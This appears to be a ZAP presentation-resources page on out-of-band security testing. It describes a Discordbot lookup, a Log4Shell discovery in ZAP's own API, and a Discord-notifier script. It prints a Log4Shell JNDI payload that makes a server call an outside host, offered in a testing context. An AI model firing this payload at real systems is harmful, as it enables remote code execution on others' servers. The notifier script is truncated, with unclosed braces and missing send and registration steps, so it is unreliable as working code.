OAST with ZAP - Presentation Resources

Finding Discordbot’s Address

Ever wonder how chat apps display link previews? In this demo, a URL was constructed using an Interactsh payload and pasted into a Discord channel. Soon after, a GET request appeared in ZAP’s OAST Tab, and the request had “Discordbot” in its User-Agent header value.

Discovering Log4Shell in ZAP 2.11.0

A newer version of ZAP was used to discover Log4Shell in ZAP 2.11.0 by injecting a known Log4Shell payload into the apikey parameter of the /JSON/alert/action/deleteAlert/ ZAP API endpoint. The payload used was ${jndi:ldap://{0}/abc}, where {0} was replaced by an Interactsh payload obtained from the OAST add-on.

OAST Interaction Discord Notifier

A ZAP script was used to demonstrate the capabilities of OAST request handlers. The script in the demo registered an OAST request handler to send messages to a Discord webhook whenever a new OAST interaction was received.

ZAP Standalone Script Code (Nashorn)

You need a valid Discord Webhook URL for this script to work.

// This script registers an OAST message handler that sends interactions to a Discord webhook.

// Java classes used by the handler (Nashorn: Java.type returns the class object).
var Control = Java.type("org.parosproxy.paros.control.Control");
var Model = Java.type("org.parosproxy.paros.model.Model");
var HttpSender = Java.type("org.parosproxy.paros.network.HttpSender");
var HttpMessage = Java.type("org.parosproxy.paros.network.HttpMessage");
var HttpHeader = Java.type("org.parosproxy.paros.network.HttpHeader");
var HttpRequestHeader = Java.type("org.parosproxy.paros.network.HttpRequestHeader");
var URI = Java.type("org.apache.commons.httpclient.URI");

// The OAST add-on and its Interactsh service, looked up from the running ZAP instance.
var extOast = Control.getSingleton().getExtensionLoader().getExtension("ExtensionOast");
var interactsh = extOast.getInteractshService();

// Notification destination. Treat the webhook URL as a credential: anyone holding it can
// post to the channel, so keep it out of shared or committed copies of this script.
// The second constructor argument is commons-httpclient's "escaped" flag.
var discordWebHookUrl = new URI("<Replace with Discord Webhook URL>", true);

// Handles one OAST interaction: formats the interacting HTTP request as a Discord embed
// and prepares a JSON POST to the webhook URL configured above.
//
// NOTE(review): this listing looks truncated — the "fields" array and embed object opened
// below are never closed, `body` is never serialised into the outgoing message and `sender`
// is never used in the visible lines. Compare against the original script before running it.
function requestHandler(request) {
    // The interaction's HTTP message. Header and body are whatever the remote party sent to
    // the OAST endpoint, so treat them as untrusted text.
    var msg = request.getHistoryReference().getHttpMessage()
    // Wrapped in Discord code fences; "---" stands in for an empty value.
    // NOTE(review): a request containing ``` would most likely close the fence early and the
    // remainder would render as Discord markdown — consider neutralising backticks first.
    var formattedRequestHeader = "```\n" + (msg.getRequestHeader().toString() || "---") + "\n```"
    var formattedRequestBody = "```\n" + (msg.getRequestBody().toString() || "---") + "\n```"
    // NOTE(review): assigned without `var`, so in non-strict Nashorn this becomes a script-global
    // rather than a local. Discord also documents length limits on embed field values, so a
    // large request body may cause the webhook POST to be rejected.
    embed1 = {
        "title": "Interaction",
        "fields": [
            { "name": "Request Header", "value": formattedRequestHeader },
            { "name": "Request Body", "value": formattedRequestBody },
            // Interaction metadata from the OAST add-on; "---" when a value is empty.
            { "name": "Source", "value": request.getSource() || "---", "inline": true },
            { "name": "Referer", "value": request.getReferer() || "---", "inline": true },
            { "name": "Handler", "value": request.getHandler() || "---", "inline": true }
    // NOTE(review): the closing `]` and `}` of embed1 are missing from this listing.
    var content = ":sparkles: New interaction received.\n"
    // Webhook payload: a text line plus the single embed built above.
    var body = { "content": content, "embeds": [embed1] }

    var requestMethod = HttpRequestHeader.POST;
    // Re-declares `msg`; from here on it is the outgoing webhook request (the interaction
    // message is not referenced again in the visible lines).
    var msg = new HttpMessage()
    msg.setRequestHeader(new HttpRequestHeader(requestMethod, discordWebHookUrl, HttpHeader.HTTP11));
    msg.getRequestHeader().setHeader(HttpHeader.CONTENT_TYPE, HttpHeader.JSON_CONTENT_TYPE);
    // Sender built from ZAP's connection options. The `true` flag and the initiator constant are
    // kept as written — confirm their meaning against HttpSender's constructor before changing them.
    var sender = new HttpSender(Model.getSingleton().getOptionsParam().getConnectionParam(), true, HttpSender.MANUAL_REQUEST_INITIATOR);
    // NOTE(review): the step that sets `body` on `msg` and sends it via `sender` does not appear
    // in this listing.

// Startup confirmation written to the ZAP script console.
// NOTE(review): no call that registers requestHandler with the OAST/Interactsh service appears
// in the lines above, so as listed the handler would never fire; the registration line seems
// to have been dropped from this page.
print("OAST Discord Notifier registered.")